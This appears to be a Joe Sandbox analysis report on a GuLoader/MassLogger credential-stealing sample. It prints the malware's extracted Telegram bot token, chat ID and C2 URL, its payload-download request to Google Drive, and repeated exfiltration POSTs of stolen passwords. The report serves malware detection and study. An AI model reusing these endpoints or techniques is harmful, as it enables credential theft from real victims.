Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4UQ5wnI389.exe

Overview

General Information

Sample name:4UQ5wnI389.exe
renamed because original name is a hash value
Original sample name:280344d8a94a23a0e351b1c1553ed3f1ae6db9c06c75ecda292211f5562de552.exe
Analysis ID:1588102
MD5:f28c3285968229b7e0c723633fb5c161
SHA1:8be784dccfd84953c94642021a261a4459c68df8
SHA256:280344d8a94a23a0e351b1c1553ed3f1ae6db9c06c75ecda292211f5562de552
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 4UQ5wnI389.exe (PID: 6064 cmdline: "C:\Users\user\Desktop\4UQ5wnI389.exe" MD5: F28C3285968229B7E0C723633FB5C161)
    • 4UQ5wnI389.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\4UQ5wnI389.exe" MD5: F28C3285968229B7E0C723633FB5C161)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA", "Telegram Chatid": "1934716051"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1940482380.0000000004709000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: 4UQ5wnI389.exe PID: 5624JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:25:36.607170+010020577441Malware Command and Control Activity Detected192.168.2.849724149.154.167.220443TCP
            2025-01-10T21:25:38.885501+010020577441Malware Command and Control Activity Detected192.168.2.849751149.154.167.220443TCP
            2025-01-10T21:25:42.267307+010020577441Malware Command and Control Activity Detected192.168.2.849778149.154.167.220443TCP
            2025-01-10T21:25:43.686228+010020577441Malware Command and Control Activity Detected192.168.2.849785149.154.167.220443TCP
            2025-01-10T21:25:46.161082+010020577441Malware Command and Control Activity Detected192.168.2.849802149.154.167.220443TCP
            2025-01-10T21:25:48.476323+010020577441Malware Command and Control Activity Detected192.168.2.849814149.154.167.220443TCP
            2025-01-10T21:25:49.899223+010020577441Malware Command and Control Activity Detected192.168.2.849826149.154.167.220443TCP
            2025-01-10T21:25:51.442796+010020577441Malware Command and Control Activity Detected192.168.2.849838149.154.167.220443TCP
            2025-01-10T21:25:54.951438+010020577441Malware Command and Control Activity Detected192.168.2.849862149.154.167.220443TCP
            2025-01-10T21:26:02.454225+010020577441Malware Command and Control Activity Detected192.168.2.849913149.154.167.220443TCP
            2025-01-10T21:26:06.180000+010020577441Malware Command and Control Activity Detected192.168.2.849939149.154.167.220443TCP
            2025-01-10T21:26:12.402659+010020577441Malware Command and Control Activity Detected192.168.2.849981149.154.167.220443TCP
            2025-01-10T21:26:13.818735+010020577441Malware Command and Control Activity Detected192.168.2.849992149.154.167.220443TCP
            2025-01-10T21:26:16.222254+010020577441Malware Command and Control Activity Detected192.168.2.850006149.154.167.220443TCP
            2025-01-10T21:26:17.759166+010020577441Malware Command and Control Activity Detected192.168.2.850008149.154.167.220443TCP
            2025-01-10T21:26:26.089180+010020577441Malware Command and Control Activity Detected192.168.2.850011149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:25:26.788911+010028032742Potentially Bad Traffic192.168.2.849711158.101.44.24280TCP
            2025-01-10T21:25:33.617012+010028032742Potentially Bad Traffic192.168.2.849711158.101.44.24280TCP
            2025-01-10T21:25:38.007777+010028032742Potentially Bad Traffic192.168.2.849745158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:25:12.948033+010028032702Potentially Bad Traffic192.168.2.849708142.250.186.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:25:34.243472+010018100081Potentially Bad Traffic192.168.2.849724149.154.167.220443TCP
            2025-01-10T21:25:38.597069+010018100081Potentially Bad Traffic192.168.2.849751149.154.167.220443TCP
            2025-01-10T21:25:42.066599+010018100081Potentially Bad Traffic192.168.2.849778149.154.167.220443TCP
            2025-01-10T21:25:43.511266+010018100081Potentially Bad Traffic192.168.2.849785149.154.167.220443TCP
            2025-01-10T21:25:45.909104+010018100081Potentially Bad Traffic192.168.2.849802149.154.167.220443TCP
            2025-01-10T21:25:47.365103+010018100081Potentially Bad Traffic192.168.2.849814149.154.167.220443TCP
            2025-01-10T21:25:49.719264+010018100081Potentially Bad Traffic192.168.2.849826149.154.167.220443TCP
            2025-01-10T21:25:51.193548+010018100081Potentially Bad Traffic192.168.2.849838149.154.167.220443TCP
            2025-01-10T21:25:54.693478+010018100081Potentially Bad Traffic192.168.2.849862149.154.167.220443TCP
            2025-01-10T21:26:02.276649+010018100081Potentially Bad Traffic192.168.2.849913149.154.167.220443TCP
            2025-01-10T21:26:05.931191+010018100081Potentially Bad Traffic192.168.2.849939149.154.167.220443TCP
            2025-01-10T21:26:12.110863+010018100081Potentially Bad Traffic192.168.2.849981149.154.167.220443TCP
            2025-01-10T21:26:13.640645+010018100081Potentially Bad Traffic192.168.2.849992149.154.167.220443TCP
            2025-01-10T21:26:16.047903+010018100081Potentially Bad Traffic192.168.2.850006149.154.167.220443TCP
            2025-01-10T21:26:17.585743+010018100081Potentially Bad Traffic192.168.2.850008149.154.167.220443TCP
            2025-01-10T21:26:25.835431+010018100081Potentially Bad Traffic192.168.2.850011149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 4UQ5wnI389.exeAvira: detected
            Source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA", "Telegram Chatid": "1934716051"}
            Source: 4UQ5wnI389.exe.5624.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendMessage"}
            Source: 4UQ5wnI389.exeVirustotal: Detection: 75%Perma Link
            Source: 4UQ5wnI389.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6D1EC CryptUnprotectData,5_2_37A6D1EC
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_37A6D9D9 CryptUnprotectData,5_2_37A6D9D9
            Source: 4UQ5wnI389.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49712 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49724 version: TLS 1.2
            Source: 4UQ5wnI389.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6C985h5_2_37A6C638
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A61042h5_2_37A60C28
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A60671h5_2_37A603AF
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6EA48h5_2_37A6E790
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A61042h5_2_37A60F6F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6E198h5_2_37A6DEE1
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6C041h5_2_37A6BD88
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6B791h5_2_37A6B4EC
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A61042h5_2_37A60C1B
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6EEA0h5_2_37A6EBF7
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6E5F0h5_2_37A6E339
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6DD40h5_2_37A6DA89
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6C499h5_2_37A6C1F2
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6BBE9h5_2_37A6B944
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6B339h5_2_37A6B07F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37A6F2F8h5_2_37A6F042
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B1882Dh5_2_37B18650
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B191B7h5_2_37B18650
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then push 00000000h5_2_37B1BDF0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B116A8h5_2_37B11400
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B11250h5_2_37B10FA8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B16A68h5_2_37B167C0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B161B8h5_2_37B15F10
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B14218h5_2_37B13F70
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B13968h5_2_37B136C0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B130B8h5_2_37B12E10
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B15908h5_2_37B15660
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B15058h5_2_37B14DB0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B12808h5_2_37B12560
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B11F58h5_2_37B11CB0
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B17770h5_2_37B174C8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B16EC0h5_2_37B16C18
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B14670h5_2_37B143C8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B13DC0h5_2_37B13B18
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B16610h5_2_37B16368
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37B17B4F
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B15D60h5_2_37B15AB8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B154B0h5_2_37B15208
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B13510h5_2_37B13268
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B12C60h5_2_37B129B8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B123B0h5_2_37B12108
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B14ACAh5_2_37B14820
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B17318h5_2_37B17070
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then jmp 37B11B00h5_2_37B11858
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then push 00000000h5_2_3818E8A8
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then push 00000000h5_2_3818F3F6
            Source: C:\Users\user\Desktop\4UQ5wnI389.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_3818F6B8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49838 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49838 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49785 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49814 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49814 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49785 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49724 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49724 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49778 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49778 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49751 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49939 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49862 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49802 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49939 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49802 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49862 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49751 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49826 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49826 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49981 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49981 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318b05b80552Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31bfeb0e4d02Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e806c5ea20Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f9ee600d70Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321822276aafHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322b49d64871Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32468ff34b56Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3256e00e1ca8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3282309ea77bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32daaef8b599Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33052afb8cacHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33517e971c7fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3367b73ade45Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd338994765545Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a0f2189f40Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318b247ec2ccHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49745 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 142.250.186.78:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
